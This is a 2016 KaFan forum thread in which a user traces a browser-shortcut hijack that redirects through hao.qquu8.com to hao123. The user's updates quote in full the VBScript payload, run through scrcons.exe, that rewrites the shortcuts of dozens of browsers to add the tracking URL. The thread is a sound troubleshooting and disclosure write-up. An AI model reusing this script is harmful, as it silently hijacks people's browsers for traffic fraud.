查看: 27564|回复: 15
收起左侧

[讨论] (解决)桌面浏览器快捷方式都被加上了http://hao.qquu8.com/?m=yx&r=x

[复制链接]
swaggerz
发表于 2016-6-26 15:36:26 | 显示全部楼层 |阅读模式
本帖最后由 swaggerz 于 2016-7-6 17:48 编辑

所有的浏览器快捷方式都被加上了这个网站,然后跳转到hao123,很长时间都不想管,以为是小问题,昨天想改回来却发现不容易改回来。

网上的方法都试过了,

在注册表里搜索qquu8、hao123,全部删除,无效
查看可疑的进程,由于这个快捷方式是隔一段时间才被修改的,至少间隔20分钟以上,我也没耐心去监控
windows目录下也没有OEM8, 也没有kms10
driver目录下也没有Mslmedia.sys

最后仔细排查,发现有一个haStdnetfilter.sys文件,通过查询,才确定了是这个
https://www.virustotal.com/en/fi ... nalysis/1466926439/
删除后解决

这个帖子是给其他有同样问题的朋友的,因为google前几页都没有解决问题,用haStdnetfilter.sys搜索只发现了这个链接有点用,http://blog.sina.com.cn/s/blog_4ce2ff1e0102wjvo.html

haStdnetfilter.sys应该HTTP Analyzer的驱动,之前弄错了




2016-6-28

更新一下,按上述方式,当时观察了至少半天的时间,没有被改回去,以为好了。
目前是修改快捷方式的时间间隔延长了,但还是会被修改。给我的感觉是修改的时间不定,用process monitor观察了2个小时,也没见到被修改,有时没一会又被改
昨天安装了火绒,添加了一条规则,禁止任意程序修改和创建桌面图标快捷方式,还是会被改,但只会被修改一个。


日志显示:

        操作进程:C:\Windows\System32\wbem\scrcons.exe
        风险动作:修改桌面快捷方式(后台创建)
        目标文件:C:\Users\s\Desktop\S - Chrome.lnk
        用户操作:已阻止

查看scrcons.exe无危险

又加一条规则:禁止任意程序执行scrcons.exe,不知道这样行不行




再次更新,是svchost.exe调用的

操作进程:C:\windows\system32\svchost.exe
触犯规则:Group1
操作类型:执行
C:\windows\system32\wbem\scrcons.exe
用户操作:已阻止

再如何?




2016-7-5

http://blog.sina.com.cn/s/blog_8be14f360102vyrc.html暂时找到一个

On Error Resume Next:Const link = "http://hao.qquu8.com/?m=yx&r=x":Const link360 = "http://hao.qquu8.com/?m=yx&r=x&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\s\Desktop,C:\Users\s\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\s\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\s\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:




2016-7-6

今天一天都未出现被修改情况,暂时应该没问题了
dej.sf
头像被屏蔽
发表于 2016-6-26 16:04:58 | 显示全部楼层
哎 用了小马激活 对吧?
dingqiankun
发表于 2016-6-27 00:22:04 来自手机 | 显示全部楼层
引狼入室啊
swaggerz
 楼主| 发表于 2016-6-28 17:31:52 | 显示全部楼层
dej.sf 发表于 2016-6-26 16:04
哎 用了小马激活 对吧?

很长时间了,至少1年以上,不确定是不是小马激活
swaggerz
 楼主| 发表于 2016-6-28 17:32:32 | 显示全部楼层

没办法,裸奔多少会遇到
kxmp
发表于 2016-6-28 21:02:14 | 显示全部楼层
我电脑里面就没这个srcons.exe
swaggerz
 楼主| 发表于 2016-6-28 21:14:35 | 显示全部楼层
kxmp 发表于 2016-6-28 21:02
我电脑里面就没这个srcons.exe

我刚看了最近装的一台win7,里面有这个文件。
退一步说,即使这个是病毒,它也是被svchost.exe调用的
kxmp
发表于 2016-6-28 21:21:29 | 显示全部楼层
swaggerz 发表于 2016-6-28 21:14
我刚看了最近装的一台win7,里面有这个文件。
退一步说,即使这个是病毒,它也是被svchost.exe调用的

你盗版的吧
墩丶儿
发表于 2016-6-29 10:17:35 | 显示全部楼层
我的也出现了,不过都是在我的浏览器快捷方式里面加的网址,我是直接在属性里删除之后,禁止写入就好了
liulangzhecgr
发表于 2016-7-5 08:00:37 | 显示全部楼层
swaggerz 发表于 2016-6-28 17:32
没办法,裸奔多少会遇到

裸奔?!像你这样裸奔
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-24 05:34 , Processed in 0.137361 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表